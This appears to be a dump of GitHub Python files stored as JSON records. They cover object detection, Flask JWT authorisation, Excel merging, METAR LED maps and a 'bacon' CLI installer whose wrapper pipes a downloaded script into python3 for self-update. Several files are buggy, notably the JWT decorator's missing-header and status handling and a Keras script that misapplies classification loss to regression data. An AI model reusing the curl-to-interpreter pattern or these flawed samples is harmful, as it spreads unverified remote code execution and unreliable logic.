preprocess(img)\n outputs = predictor.run(inputs)\n output = outputs[0].as_ndarray()\n draw_result(img, output)\n cv2.waitKey()\n\ndef test_camera(predictor):\n cap = cv2.VideoCapture(0)\n while True:\n ret, img = cap.read()\n if not ret:\n break\n inputs = preprocess(img)\n outputs = predictor.run(inputs)\n output = outputs[0].as_ndarray()\n draw_result(img, output)\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--model_dir\", default=this_dir+\"/\"+modelname)\n parser.add_argument(\"--image\", default=this_dir+\"/../images/000001.jpg\")\n return parser.parse_args()\n\nif __name__ == \"__main__\":\n args = parse_args()\n #model_file = args.model_dir + \"/__model__\"\n #params_file = args.model_dir + \"/__params__\"\n config = AnalysisConfig(args.model_dir)\n config.disable_gpu()\n predictor = create_paddle_predictor(config)\n #test_image(predictor, args.image)\n test_camera(predictor)","repo_name":"imistyrain/ssd-models","sub_path":"paddle/ssd_paddle.py","file_name":"ssd_paddle.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"21"} +{"seq_id":"8219373323","text":"from flask import (\n request,\n jsonify\n)\n\nimport sys\nimport jwt\nfrom config.local import config\n\nfrom functools import wraps\n\ndef authorize(f):\n @wraps(f)\n def decorator(*args, **kwargs):\n token = None\n print('authentication token: ', request.headers['X-ACCESS-TOKEN'])\n if 'X-ACCESS-TOKEN' in request.headers:\n token = request.headers['X-ACCESS-TOKEN']\n\n if token is None:\n return jsonify({\n 'success': False,\n 'message': 'Unauthenticated user, please provide your credentials'\n }), 401\n \n try:\n jwt.decode(token, config['SECRET_KEY'], config['ALGORYTHM'])\n #print('\\tdecode token: ', data)\n except Exception as e:\n print('e: ', e)\n print('sys.exc_info(): ', sys.exc_info())\n return jsonify({\n 'success': False,\n 'message': 'Invalid Token, try a new token'\n })\n \n return f(*args, **kwargs)\n decorator.__name__ = f.__name__\n return decorator\n","repo_name":"UTEC-CS2B01/employees-2-0-2023-1","sub_path":"backend/app/authentication.py","file_name":"authentication.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"29747142038","text":"import tkinter as tk\r\nfrom tkinter import filedialog\r\nimport openpyxl\r\n\r\ndef read_excel_file(file_path):\r\n workbook = openpyxl.load_workbook(file_path)\r\n sheet = workbook.active\r\n \r\n dictionary = {}\r\n \r\n found_integer = False\r\n \r\n for row in sheet.iter_rows(min_row=2, values_only=True):\r\n key = row[0]\r\n value_c = row[2]\r\n value_e = row[4]\r\n \r\n if not found_integer:\r\n if isinstance(key, int):\r\n found_integer = True\r\n if key != '' and value_c != '' and value_e != '':\r\n dictionary[key] = {'descrizione': value_c, 'prezzo': value_e, 'nomefile': file_path}\r\n else:\r\n if key != '':\r\n dictionary[key] = {'descrizione': value_c, 'prezzo': value_e, 'nomefile': file_path}\r\n \r\n return dictionary\r\n\r\ndef merge_and_filter_dictionaries(dict1, dict2):\r\n common_keys = set(dict1.keys()) & set(dict2.keys())\r\n merged_dict = {}\r\n \r\n for key in common_keys:\r\n price1 = dict1[key]['prezzo'] if dict1.get(key) else None\r\n price2 = dict2[key]['prezzo'] if dict2.get(key) else None\r\n \r\n if price1 is not None and price2 is not None:\r\n if price1 < price2:\r\n merged_dict[key] = dict1[key]\r\n else:\r\n merged_dict[key] = dict2[key]\r\n \r\n return merged_dict\r\n\r\ndef browse_file(entry):\r\n file_path = filedialog.askopenfilename(filetypes=[('Excel Files', '*.xlsx')])\r\n if file_path:\r\n entry.delete(0, tk.END)\r\n entry.insert(0, file_path)\r\n\r\ndef process_files():\r\n file_path1 = entry_file_path1.get()\r\n file_path2 = entry_file_path2.get()\r\n \r\n if file_path1 and file_path2:\r\n dict1 = read_excel_file(file_path1)\r\n dict2 = read_excel_file(file_path2)\r\n \r\n merged_dict = merge_and_filter_dictionaries(dict1, dict2)\r\n \r\n # Creazione di un nuovo file Excel\r\n new_file = openpyxl.Workbook()\r\n sheet = new_file.active\r\n \r\n # Scrittura dei dati nel foglio di lavoro\r\n sheet['A1'] = 'Chiave'\r\n sheet['B1'] = 'Descrizione'\r\n sheet['C1'] = 'Prezzo'\r\n sheet['D1'] = 'Nome File'\r\n \r\n row = 2\r\n for key, value in merged_dict.items():\r\n sheet.cell(row=row, column=1).value = key\r\n sheet.cell(row=row, column=2).value = value['descrizione']\r\n sheet.cell(row=row, column=3).value = value['prezzo']\r\n sheet.cell(row=row, column=4).value = value['nomefile']\r\n row += 1\r\n \r\n # Salvataggio del file Excel\r\n new_file.save('merged_data.xlsx')\r\n new_file.close()\r\n \r\n label_message.config(text=\"File Excel salvato correttamente.\")\r\n else:\r\n label_message.config(text=\"Seleziona entrambi i file.\")\r\n\r\n\r\n# Creazione dell'interfaccia grafica utilizzando Tkinter\r\nwindow = tk.Tk()\r\nwindow.title(\"Merge Excel Files\")\r\nwindow.geometry(\"400x200\")\r\n\r\n# Label e Entry per il percorso del file 1\r\nlabel_file_path1 = tk.Label(window, text=\"Percorso del file 1:\")\r\nlabel_file_path1.pack()\r\nentry_file_path1 = tk.Entry(window)\r\nentry_file_path1.pack()\r\n\r\n# Pulsante di navigazione per il file 1\r\nbutton_browse1 = tk.Button(window, text=\"Sfoglia\", command=lambda: browse_file(entry_file_path1))\r\nbutton_browse1.pack()\r\n\r\n# Label e Entry per il percorso del file 2\r\nlabel_file_path2 = tk.Label(window, text=\"Percorso del file 2:\")\r\nlabel_file_path2.pack()\r\nentry_file_path2 = tk.Entry(window)\r\nentry_file_path2.pack()\r\n\r\n# Pulsante di navigazione per il file 2\r\nbutton_browse2 = tk.Button(window, text=\"Sfoglia\", command=lambda: browse_file(entry_file_path2))\r\nbutton_browse2.pack()\r\n\r\n# Pulsante per avviare il processo di unione e filtraggio\r\nbutton_process = tk.Button(window, text=\"Confronta\", command=process_files)\r\nbutton_process.pack()\r\n\r\nlabel_message = tk.Label(window)\r\nlabel_message.pack()\r\n\r\nwindow.mainloop()\r\n","repo_name":"lostefanoz/stefano","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33713531077","text":"import json\r\nimport cv2\r\nimport os\r\nimport glob\r\n\r\ndef getRatio(h, w):\r\n\t'''return ratios'''\r\n\tratio = h/w\r\n\tscore = (ratio/1.618)*100\r\n\treturn score\r\n\r\n\r\ndef getVerticalPts(keypoints):\r\n\t'''y-axis ratios(2)'''\r\n\tx1, y1 = keypoints['left_eye']\r\n\tx2, y2 = keypoints['right_eye']\r\n\t# approximation for line\r\n\tv1 = int((y1+y2)/2)\r\n\r\n\tx2, v2 = keypoints['nose']\r\n\r\n\tx1, y1 = keypoints['mouth_left']\r\n\tx2, y2 = keypoints['mouth_right']\r\n\t#approx line\r\n\tv3 = int((y1+y2)/2)\r\n\r\n\treturn v1, v2, v3\r\n\r\n\r\ndef getHorizontalPts(keypoints):\r\n\t'''x-axis ratios(2)'''\r\n\th2, y = keypoints['left_eye']\r\n\th3, y = keypoints['right_eye']\r\n\treturn h2, h3\r\n\r\n\r\ndef calculateScore(result):\r\n\t'''write scores to file'''\t\r\n\toutput_path = './data_store/output'\r\n\tx,y,w,h = result[0]['box']\r\n\tkeypoints = result[0]['keypoints']\r\n\r\n\tratio1 = getRatio(h, w)\r\n\r\n\t#vertical ratios\r\n\tv1, v2, v3 = getVerticalPts(keypoints)\r\n\tv4 = y+h\r\n\tratio2 = getRatio(v3-v1, v2-v1)\r\n\tratio3 = getRatio(v4-v1, v3-v1)\r\n\r\n\t#horizontal ratios\r\n\th1 = x\r\n\th4 = x+w\r\n\th2, h3 = getHorizontalPts(keypoints)\r\n\tratio4 = getRatio(h3-h1, h3-h2)\r\n\tratio5 = getRatio(h4-h1, h3-h1)\r\n\r\n\tface_det = {\r\n\t\t'score1':ratio1,\r\n\t\t'score2':ratio2,\r\n\t\t'score3':ratio3,\r\n\t\t'score4':ratio4,\r\n\t\t'score5':ratio5\r\n\t}\r\n\r\n\twith open(os.path.join(output_path,\"face_det.txt\"),'w') as out:\r\n\t\tjson.dump(face_det, out)\r\n","repo_name":"sudhamsugurijala/Facial-Reconstruction","sub_path":"server/measurements/getMeasure.py","file_name":"getMeasure.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15899164690","text":"\njum_semen = input(\"Masukkan jumlah semen yanhg nda beli : \") \nharga_semen = 60000\ndiskon1 = 2/100\ndiskon2 = 5/100\n\n\n \nif jum_semen > 100 :\n Total_diskon = jum_semen * harga_semen - diskon1 \n\nelif jum_semen > 200 :\n Total_diskon = jum_semen * harga_semen - diskon2 \nelse: \n Total_diskon = 0 \n\nprint(\"jumlah semen = \" , jum_semen) \nprint(\"total disko yang di dpt dari pembelian = \" , Total_diskon)\n\n \n","repo_name":"AlimRabbani/RPL-1-DASAR-PHYTON-","sub_path":"hitung.py","file_name":"hitung.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5377170427","text":"import argparse\nimport shell_executor as se\nimport yaml\n\n\nclass rt_cmd:\n def __init__(self):\n self.cmds = []\n def add(self, c):\n self.cmds.append(c)\n\nclass rt_env:\n def __init__(self):\n self.envs = {}\n def set(self, k, v):\n self.envs[k] = v\n\nclass rt_files:\n def __init__(self):\n self.links = set()\n self.copys = set()\n\nclass rt_job:\n def __init__(self, name):\n self.name = name\n self.file = rt_files() \n self.env = rt_env() \n self.cmd = rt_cmd()\n def get_cwd(self):\n return \"@DEP\" \n\nclass rt_test:\n def __init__(self, name):\n self.name = name\n self.jobs = []\n def create_job(self, name):\n j = rt_job(name)\n self.jobs.append(j)\n return j\n\nclass regression_test:\n def __init__(self, ws_dir):\n self.ws_dir = ws_dir\n self.tests = []\n def create_test(self, name):\n t = rt_test(name)\n self.tests.append(t)\n return t\n def process(self):\n parser = argparse.ArgumentParser()\n parser.add_argument('-w', '--workers', type=int, default=2, help='max concurrent workers(thread), default=2')\n parser.add_argument('-l', '--list', action=\"store_true\", help='list job only')\n parser.add_argument('-g', '--gui', action=\"store_true\", help='show gui')\n args = parser.parse_args()\n jobs = {}\n for t in self.tests:\n last_job_name = None\n for j in t.jobs:\n job_name = t.name + \"_\" + j.name\n job_data = {}\n cmds = []\n for l in j.file.links:\n if not (l.startswith(\"/\") or l.startswith(\"@\")):\n l = \"@WD/\" + l\n cmds.append(f\"ln -s {l} . || :\")\n for c in j.file.copys:\n if not (c.startswith(\"/\") or c.startswith(\"@\")):\n c = \"@WD/\" + c\n cmds.append(f\"cp -rf {c} . || :\")\n cmds.extend(j.cmd.cmds)\n job_data[\"cmds\"] = cmds\n job_data[\"envs\"] = j.env.envs\n if last_job_name is not None:\n job_data[\"dep\"] = last_job_name\n jobs[job_name] = job_data\n last_job_name = job_name\n \n a = se.Agent(self.ws_dir, jobs)\n if args.gui:\n a.launch_gui()\n return\n if not args.list:\n a.run(args.workers)\n a.dump_csv(\"se_result.csv\")\n print(\"see se_result.csv\")\n","repo_name":"gkmike/shell_executor","sub_path":"example/100_tiny_regression_wrapper/tiny_regression_test.py","file_name":"tiny_regression_test.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"7446773125","text":"import numpy as np\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.datasets import load_diabetes\r\nimport time\r\n\r\n# 1. 데이터\r\n\r\ndatasets = load_diabetes()\r\nprint(datasets.DESCR)\r\nprint(datasets.feature_names)\r\n# 속성 정보:\r\n# - 연령\r\n# - 성별의\r\n# - 체질량 지수\r\n# - bp 평균 혈압\r\n# - s1 tc, 총 혈청 콜레스테롤\r\n# - s2 ldl, 저밀도 지질단백질\r\n# - s3 hdl, 고밀도 지질단백질\r\n# - sch, 총 콜레스테롤 / HDL\r\n# - s5 ltg, 혈청 트리글리세리드 수치 기록 가능\r\n# - s6 글루, 혈당 수치\r\n#['age', 'sex', 'bmi', 'bp', 's1', 's2', 's3', 's4', 's5', 's6']\r\n\r\nx = datasets.data\r\ny = datasets.target\r\nprint(x.shape,y.shape) #(442,10) (442,)\r\n\r\nx_train,x_test,y_train,y_test= train_test_split(\r\n x,y,train_size=0.7,random_state=100,shuffle=True\r\n)\r\nprint(x_train.shape,y_train.shape)\r\nprint(x_test.shape,y_test.shape)\r\nprint(y_test)\r\n\r\n# 2. 모델구성\r\nmodel = Sequential()\r\nmodel.add(Dense(221,activation=\"linear\", input_dim=10))\r\nmodel.add(Dense(100,activation=\"relu\"))\r\nmodel.add(Dense(50,activation=\"relu\"))\r\nmodel.add(Dense(1,activation=\"sigmoid\"))\r\n\r\n# 3. 컴파일 훈련\r\n\r\nmodel.compile(loss='binary_crossentropy',optimizer='adam'\r\n ,metrics='accuracy')\r\nstart_time = time.time()\r\nmodel.fit(x_train,y_train,epochs=100,batch_size=200,verbose=0)\r\nend_time = time.time() - start_time\r\n\r\n# 4. 평가 예측\r\n\r\n# loss,acc = model.evaluate(x_test,y_test)\r\n# print('loss : ', loss)\r\n# print('acc : ', acc)\r\n\r\nloss = model.evaluate(x_test,y_test)\r\ny_predict=model.predict(x_test)\r\ny_predict=np.round(y_predict)\r\nacc = accuracy_score(y_test,y_predict)\r\nprint('loss : ',loss)\r\nprint('acc: ',acc)","repo_name":"Romangduck/My-AI","sub_path":"tf12_diabetes_softmax.py","file_name":"tf12_diabetes_softmax.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32825333330","text":"import logging\nimport signal\nimport threading\nimport time\nimport yaml\n\nfrom . import config_file\nfrom avwx.tds import get_latest_metar\n\nlogger = logging.getLogger(__name__)\n\nflight_category_colors = {\n 'VFR': (0, 255, 0),\n 'MVFR': (0, 0, 255),\n 'IFR': (255, 0, 0),\n 'LIFR': (255, 0, 255)}\n\nclass LedController:\n \"\"\"\n Display LED color values to standard output.\n This class acts as a virtual LED strip, useful for testing\n functionality and as a base class for actual LED strips.\n \"\"\"\n\n def __init__(self, leds):\n \"\"\"\n Create an LedController\n leds: List of LEDs\n \"\"\"\n\n self.leds = {led: None for led in leds}\n\n def set_led(self, led, color):\n \"\"\"\n Set an LED color. The color will not display until\n show() is called.\n led: The LED to update\n color: (r, g, b) tuple\n \"\"\"\n self.leds[led] = color\n \n def clear(self):\n \"\"\"\n Clear (turn off) the LEDs. The LEDs will not clear\n until show() is called.\n \"\"\"\n for led in self.leds.keys():\n self.leds[led] = None\n\n def show(self):\n \"\"\"\n Print the LED values to the console\n \"\"\"\n for led, color in self.leds.items():\n logger.info(f\"Setting LED {led} to {color}\")\n\nclass NotRaspberryPiException(Exception):\n \"\"\"\n Custom exception to indicate an action which cant be done because\n the device is not a Raspberry Pi\n \"\"\"\n pass\n\nclass RaspberryPiLedController(LedController):\n \"\"\"\n Display LED color values to a WS2801 strip attached to\n a Raspberry Pi\n \"\"\"\n\n def __init__(self, leds, clock_pin, data_pin):\n \"\"\"\n Create a RaspberryPiLedController.\n leds: List of LED numbers\n clock_pin: GPIO pin that the clock pin on the WS2801 connects to\n data_pin: GPIO pin that the data pin on the WS2801 connects to\n \"\"\"\n super().__init__(leds)\n import Adafruit_WS2801\n \n try:\n self.pixels = Adafruit_WS2801.WS2801Pixels(len(leds),\n clk=clock_pin,\n do=data_pin)\n except RuntimeError:\n raise NotRaspberryPiException(\"Unable to load Adafruit_WS2801.\")\n \n\n # clear previously displayed colors from the WS2801\n self.clear()\n self.show()\n \n def clear(self):\n \"\"\"\n Set all the LEDs to off. The LEDs will not update until show() is called.\n \"\"\"\n super().clear()\n self.pixels.clear()\n\n def show(self):\n \"\"\"\n Update the LED strip to display the currently set colors\n \"\"\"\n for led, color in self.leds.items():\n if not color:\n color = (0, 0, 0)\n\n self.pixels.set_pixel_rgb(led, *color)\n\n self.pixels.show()\n time.sleep(1)\n\ndef load_config(config_file):\n \"\"\"Load configuration file\"\"\"\n logger.debug(f\"Reading configuration from {config_file}\")\n with open(config_file, 'rb') as config:\n return yaml.load(config, Loader=yaml.Loader)\n\ndef get_category_color(metar):\n \"\"\"\n Get the color that represents the flight category described by\n the current metar.\n VFR (Visual Flight Rules) - Green\n MVFR (Marginal Visual Flight Rules) - Blue\n IFR (Instrument Flight Rules) - Red\n LIFR (Low Instrument Flight Rules) - Magenta\n \"\"\"\n \n try:\n return flight_category_colors[metar['flight_category']]\n except KeyError:\n return\n\ndef update(controller: LedController, stations):\n \"\"\"\n Update the LED display to display current data\n controller: The controller to update\n stations: the list of stations that are to be updated\n \"\"\"\n\n # get METAR data\n try:\n metars = get_latest_metar([_['code'] for _ in stations])\n except RuntimeError:\n logging.exception(\"Unable to retrieve metar data\")\n\n # translate METAR into color values\n for station in stations:\n name = station['name']\n code = station['code']\n\n try:\n metar = metars[code]\n color = get_category_color(metar)\n\n if not color:\n logging.error(f\"Unable to determine color from METAR for: {name} ({code})\")\n except KeyError:\n metar = None\n color = None\n logging.error(f\"No metar data for: {name} ({code})\")\n\n logger.debug(f\"Setting {station['name']} ({station['code']}) to {color}\")\n controller.set_led(station['led'], color)\n\n # tell the LED controller to display the new colors\n controller.show()\n\nclass SignalReceiver:\n \"\"\"\n SignalReceiver is used to trap signals to enable clean shutdown.\n \"\"\"\n def __init__(self, signals=None):\n \"\"\"\n Create a SignalReceiver\n signals: Signal numbers to trap. If None, SIGINT and SIGTERM are used\n \"\"\"\n self._event = threading.Event()\n\n for signum in signals if signals else [signal.SIGINT, signal.SIGTERM]:\n signal.signal(signum, self._handle)\n\n @property\n def signaled(self):\n \"\"\"\n Return true if a signal was received\n \"\"\"\n return self._event.is_set()\n \n def wait(self, delay):\n \"\"\"\n Sleep until delay seconds have passed or a signal is received.\n delay: Maximum number of seconds to wait\n Returns true if a signal was received during the wait\n \"\"\"\n return self._event.wait(delay)\n\n def _handle(self, signum, frame):\n \"\"\"\n Handle receiving a signal\n \"\"\"\n logger.debug(f\"Received signal {signum}\")\n self._event.set()\n\ndef main():\n config = load_config(config_file)\n loglevel = logging.INFO if config['loglevel'] == 'info' else logging.DEBUG\n logging.basicConfig(level=loglevel)\n\n stations = config['stations']\n leds = [_['led'] for _ in stations]\n\n # create LED controller which sets and shows LED color values\n try:\n controller = RaspberryPiLedController(leds,\n config['rpi']['clock_pin'],\n config['rpi']['data_pin'])\n except NotRaspberryPiException:\n controller = LedController(leds)\n\n signal_receiver = SignalReceiver()\n\n while not signal_receiver.signaled:\n update(controller, stations)\n signal_receiver.wait(config['frequency'])\n \n # now that the program is ending, clear the map and wait a second\n controller.clear()\n controller.show()\n time.sleep(1)\n\nif __name__ == '__main__':\n main()","repo_name":"derekwisong/aviationmap","sub_path":"avmap/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":6660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7921880840","text":"#! /usr/bin/env python\n\"\"\"\nThis script must be compatible with Python 2 and Python 3\n\nIt downloads the bacon jar into BACON_JAR_FOLDER_LOCATION and sets up a Bash\nscript in ~/bin/bacon\n\nThe user is able to choose between the latest released jar from Maven Central\nor the latest snapshot jar.\n\nFor the latter, run the script with argument 'snapshot':\n\n $ python bacon_install.py snapshot\nor\n $ cat bacon_install.py | python - snapshot\n\nIf run without any argument, the latest released jar is downloaded by default\n\n\nThe Bash script wraps around the bacon jar so that the user can just type:\n\n $ bacon \n\nfrom the shell to run bacon commands.\n\nThe Bash script also supports update:\n\n $ bacon update\n $ bacon update snapshot\n\n'bacon update' just re-downloads this script from Github to download the\nrelevant bacon jar and the new bacon Bash script\n\"\"\"\nimport argparse\nimport hashlib\nimport os\nimport platform\nimport sys\nimport tempfile\nimport time\nimport xml.etree.ElementTree as ET\n\n\nMAVEN_CENTRAL_LINK = \"https://repo1.maven.org/maven2/org/jboss/pnc/bacon/cli/\"\nMAVEN_SNAPSHOT_LINK = \"https://repository.jboss.org/nexus/content/repositories/snapshots/org/jboss/pnc/bacon/cli/\"\n\nUSER_BACON_JAR_FOLDER_LOCATION = os.getenv(\"HOME\") + \"/.pnc-bacon/bin\"\nROOT_BACON_JAR_FOLDER_LOCATION = \"/opt/bacon/bin\"\n\nUSER_SHELL_FOLDER_LOCATION = os.getenv(\"HOME\") + \"/bin\"\nROOT_SHELL_FOLDER_LOCATION = \"/usr/local/bin\"\n\nTEMPLATE_BASH = \"\"\"\n#!/bin/bash\nset -e\n\nfunction check_if_java_installed {{\n command -v java > /dev/null 2>&1 || {{ echo >&2 \"java is required to run this command... Aborting!\"; exit 1; }}\n}}\nfunction usage {{\n echo \"To update to the latest released version of bacon/pnc/da/pig, run:\"\n echo \"\"\n echo \" bacon update\"\n echo \"\"\n echo \"To update to a specific released version of bacon/pnc/da/pig, run:\"\n echo \"\"\n echo \" bacon update \"\n echo \"\"\n echo \"To update to a snapshot version of bacon, run:\"\n echo \"\"\n echo \" bacon update snapshot\"\n echo \"\"\n echo \"All update commands support an optional '--location ' argument\"\n}}\nif [ \"$1\" == \"update\" ]; then\n # Script runs the bacon_install.py to update itself\n shift\n if [ \"$1\" == \"-h\" ] || [ \"$1\" == \"--help\" ]; then\n usage\n else\n curl -fsSL https://raw.github.com/project-ncl/bacon/main/bacon_install.py | python3 - \"$@\"\n fi\nelse\n check_if_java_installed\n\n if [ \"$OSTYPE\" = \"cygwin\" ]; then\n java -jar `cygpath -w {0}/bacon.jar` {1} \"$@\"\n else\n java -jar {0}/bacon.jar {1} \"$@\"\n fi\nfi\n\nif [ -z \"$1\" ]; then\n usage\nfi\n\"\"\".strip()\n\n\ndef print_mac_notice_if_required():\n \"\"\"\n Print this notice for Mac users since their PATH env var is different than\n in Linux\n \"\"\"\n\n if platform.system() == 'Darwin':\n print(\"\")\n print(\"Mac user detected! Please adjust your $PATH variable if\" +\n \" necessary to run 'bacon'\")\n print(\"\")\n print(\" $ echo 'export PATH=\\\"$PATH:${HOME}/bin\\\"' >> \" +\n \"~/.bash_profile\")\n\n\ndef download_maven_metadata_xml(url, folder):\n \"\"\"\n Download the maven-metadata.xml for bacon and put it in folder\n\n url must be without maven-metadata.xml\n \"\"\"\n if not url.endswith(\"/\"):\n url = url + \"/\"\n\n link = url + \"maven-metadata.xml\"\n download_link(link, folder, \"maven-metadata.xml\")\n\n\ndef download_link(link, folder, filename, retries=7):\n \"\"\"\n Download the link into the folder with name 'filename'\n\n Add retries in case the download fails due to stale server content issue on\n repositories.jboss.org\n \"\"\"\n\n print(\"Downloading: \" + link)\n if sys.version_info[0] >= 3:\n import urllib.request as request\n else:\n import urllib2 as request\n\n try:\n r = request.urlopen(link).read()\n\n with open(folder + \"/\" + filename, \"wb\") as f:\n f.write(r)\n except Exception as error:\n if retries > 0:\n # exponential backoff time based on 1/retries\n # max time to sleep is 30 seconds\n time_to_sleep = 30 ** (1 / retries)\n print(\"Something went wrong while downloading the link. Waiting {:.1f} seconds before retrying...\".format(time_to_sleep))\n time.sleep(time_to_sleep)\n download_link(link, folder, filename, retries=retries - 1)\n else:\n raise Exception(\"Something wrong happened while downloading the link: \" + link + \" :: \" + str(error))\n\n\ndef get_sha1_of_jar(url_of_jar):\n \"\"\"\n Return the sha1 of the download url of the jar.\n\n Arguments:\n - url_of_jar: url to download bacon.jar\n\n Returns: sha1 value\n \"\"\"\n with tempfile.TemporaryDirectory() as temp_folder:\n download_link(url_of_jar + \".sha1\", temp_folder, \"sha1\")\n with open(os.path.join(temp_folder, \"sha1\"), 'r') as f:\n return f.read().strip()\n\n\ndef calculate_sha1(location_of_file):\n \"\"\"\n Calculate sha1 of file\n\n returns None if file doesn't exist\n \"\"\"\n\n if not os.path.exists(location_of_file):\n return None\n # get sha1 of file\n h = hashlib.sha1()\n with open(location_of_file, 'rb') as file:\n while True:\n # Reading is buffered, so we can read smaller chunks.\n chunk = file.read(h.block_size)\n if not chunk:\n break\n h.update(chunk)\n return h.hexdigest()\n\n\ndef create_folder_if_absent(folder):\n if not os.path.exists(folder):\n os.makedirs(folder)\n\n\nclass BaconInstall:\n \"\"\"\n Object responsible with installing bacon\n \"\"\"\n def __init__(self, bacon_jar_location, shell_location, maven_url, version=None):\n\n self.bacon_jar_location = bacon_jar_location\n self.shell_location = shell_location\n self.maven_url = maven_url\n self.latest_version = None\n self.version = version\n\n def __is_snapshot(self):\n if self.version and self.version == \"snapshot\":\n return True\n\n return False\n\n def run(self):\n \"\"\"\n Install bacon jar\n\n Returns: None\n \"\"\"\n create_folder_if_absent(self.bacon_jar_location)\n create_folder_if_absent(self.shell_location)\n\n self.latest_version = self.__get_latest_version()\n\n self.__download_version()\n self.__create_bacon_shell_script()\n\n print(\"\")\n # latest snapshot or released version installed\n if self.__is_snapshot() or self.version is None:\n print(\"Installed version: {}!\".format(self.latest_version))\n else:\n print(\"Installed version: {}!\".format(self.version))\n print_mac_notice_if_required()\n\n def __download_version(self):\n \"\"\"\n Read the maven-metadata.xml of bacon and download the latest version\n \"\"\"\n\n if self.version and \"latest\" != self.version:\n if self.__is_snapshot():\n snapshot_version = self.__get_latest_snapshot_version()\n url = self.maven_url + \\\n self.latest_version + \"/cli-\" + snapshot_version + \"-shaded.jar\"\n else:\n url = self.maven_url + \\\n self.version + \"/cli-\" + self.version + \"-shaded.jar\"\n else:\n url = self.maven_url + \\\n self.latest_version + \"/cli-\" + self.latest_version + \"-shaded.jar\"\n\n sha1_from_maven = get_sha1_of_jar(url)\n sha1_of_existing_jar = calculate_sha1(self.bacon_jar_location + \"/bacon.jar\")\n\n if sha1_from_maven == sha1_of_existing_jar:\n print(\"Skipping download since latest bacon.jar is already installed\")\n return\n\n download_link(url, self.bacon_jar_location, \"bacon.jar\")\n sha1_of_new_jar = calculate_sha1(self.bacon_jar_location + \"/bacon.jar\")\n\n print(\"Verifying checksums... \", end='')\n if sha1_from_maven != sha1_of_new_jar:\n print(\"Failed!\")\n print(\"Checksums do not match!\")\n print(\"Checksum from Maven is: \" + sha1_from_maven)\n print(\"Checksum from downloaded jar is: \" + sha1_of_new_jar)\n print(\"Aborting!\")\n sys.exit(1)\n else:\n print(\"Success!\")\n\n print(\"bacon installed in: {}\".format(\n self.bacon_jar_location + \"/bacon.jar\"))\n\n def __get_latest_version(self):\n \"\"\"\n Read the maven-metadata.xml of bacon and parse the last released or\n snapshot version\n \"\"\"\n\n with tempfile.TemporaryDirectory() as temp_folder:\n download_maven_metadata_xml(self.maven_url, temp_folder)\n root = ET.parse(temp_folder + \"/maven-metadata.xml\").getroot()\n\n if self.__is_snapshot():\n latest_tags = root.findall(\"versioning/versions/version\")\n\n # choose the one listed last. This might bite us in the future\n latest_tag = latest_tags[-1]\n else:\n latest_tag = root.find(\"versioning/latest\")\n\n return latest_tag.text\n\n def __get_latest_snapshot_version(self):\n\n url = self.maven_url + self.latest_version\n with tempfile.TemporaryDirectory() as temp_folder:\n download_maven_metadata_xml(url, temp_folder)\n\n root = ET.parse(temp_folder + \"/maven-metadata.xml\").getroot()\n\n latest_tag = root.findall(\"versioning/snapshotVersions/snapshotVersion\")\n return latest_tag[0].find(\"value\").text\n\n def __create_bacon_shell_script(self):\n\n filename_bacon = self.shell_location + \"/bacon\"\n filename_pnc = self.shell_location + \"/pnc\"\n filename_da = self.shell_location + \"/da\"\n filename_pig = self.shell_location + \"/pig\"\n\n with open(filename_bacon, \"w\") as f:\n f.write(TEMPLATE_BASH.format(self.bacon_jar_location, \"\"))\n with open(filename_pnc, \"w\") as f:\n f.write(TEMPLATE_BASH.format(self.bacon_jar_location, \"pnc\"))\n with open(filename_da, \"w\") as f:\n f.write(TEMPLATE_BASH.format(self.bacon_jar_location, \"da\"))\n with open(filename_pig, \"w\") as f:\n f.write(TEMPLATE_BASH.format(self.bacon_jar_location, \"pig\"))\n\n os.chmod(filename_bacon, 0o755)\n os.chmod(filename_pnc, 0o755)\n os.chmod(filename_da, 0o755)\n os.chmod(filename_pig, 0o755)\n\n\ndef is_root():\n return os.geteuid() == 0\n\n\ndef main():\n \"\"\"\n Main entry point to the program\n \"\"\"\n maven_link = MAVEN_CENTRAL_LINK\n\n parser = argparse.ArgumentParser(\"Bacon installation tool\")\n parser.add_argument('--location', required=False, help=\"Specify a directory root to install to\")\n parser.add_argument(\"version\", help=\"An optional version (or 'snapshot')\", default=None, nargs='?')\n args = parser.parse_args()\n\n if args.version == 'snapshot':\n maven_link = MAVEN_SNAPSHOT_LINK\n if args.location:\n bacon_jar_location = args.location + \"/.pnc-bacon/bin\"\n shell_location = args.location + \"/bin\"\n else:\n bacon_jar_location = USER_BACON_JAR_FOLDER_LOCATION\n shell_location = USER_SHELL_FOLDER_LOCATION\n if is_root():\n bacon_jar_location = ROOT_BACON_JAR_FOLDER_LOCATION\n shell_location = ROOT_SHELL_FOLDER_LOCATION\n\n print(\"Using version '{}' with maven location of {} and installing to {}\".format(\n args.version or 'latest', maven_link, os.path.dirname(bacon_jar_location)))\n\n bacon_install = BaconInstall(\n bacon_jar_location,\n shell_location,\n maven_link,\n version=args.version)\n try:\n bacon_install.run()\n except Exception as e:\n print(e)\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n 